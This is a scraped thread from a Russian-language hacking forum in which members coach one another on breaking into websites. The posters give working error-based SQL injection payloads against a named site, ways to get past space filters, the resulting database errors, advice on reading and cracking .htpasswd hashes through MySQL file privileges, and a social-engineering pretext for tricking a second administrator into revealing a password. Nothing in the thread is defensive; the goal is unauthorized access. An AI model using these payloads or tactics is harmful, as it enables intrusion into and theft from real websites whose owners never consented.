ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.08.2016, 18:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
4644
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
↑
засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить. Подскажи мне с Error based плиз=) выше на 3 сообщения...
|
|
|
|
29.08.2016, 18:18
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от R3hab
R3hab said:
↑
то есть пароль от форума и админки могут отличатся? не от самой админки, а от бейсик авторизации. юзай СИ.
Сообщение от [URL='/members/288914/'
[URL='/members/288914/' said:
NonBlizz[/URL]]Подскажи мне с Error based плиз=) выше на 3 сообщения...
extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1
|
|
|
29.08.2016, 18:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
Сообщение от Konqi
Konqi said:
↑
не от самой админки, а от бейсик авторизации. юзай СИ. этот пароль в бд не хранится?
|
|
|
|
29.08.2016, 18:22
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от R3hab
R3hab said:
↑
этот пароль в бд не хранится? нет, обычно хранится в файле .htpasswd (если там апач). если есть права на чтение файлов (file_priv=y) в MySQL то попробуй прочитать .htpasswd и расшифровать хэш. Там обычно хэш в формате md5(APR) или Des(Unix)
|
|
|
|
29.08.2016, 18:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
4644
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
↑
не от самой админки, а от бейсик авторизации. юзай СИ.
http://site.ru/info/1'or
extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1 Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри:
Код:
Code:
http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20limit%200,1)))='1
Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц((
|
|
|
|
29.08.2016, 18:57
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от NonBlizz
NonBlizz said:
↑
Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри:
Код:
Code:
http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20limit%200,1)))='1
Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц(( вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча.
|
|
|
|
29.08.2016, 19:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
4644
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
↑
вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча. Пробую и не помогает чё то..... в чём дело не пойму..
|
|
|
|
29.08.2016, 19:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
4644
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
↑
вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча. Вот пример:
Код:
Code:
http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a0,1)))='1
Код ошибки:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_nam e%0afrom%0ainformation_schema.t' at line 1
|
|
|
|
29.08.2016, 20:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от NonBlizz
NonBlizz said:
↑
Вот пример:
Код:
Code:
http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a0,1)))='1
Код ошибки:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_nam e%0afrom%0ainformation_schema.t' at line 1судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/
|
|
|
|
29.08.2016, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
4644
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/ Заместо пробелов ставил этот символ /**/
Код:
Code:
http://ppt.ru/info/1'or/**/extractvalue(1,concat(0x3a,(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)))='1
Результат:
Просто редирект на главную страницу:
http://ppt.ru/ без ошибок и т.д
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
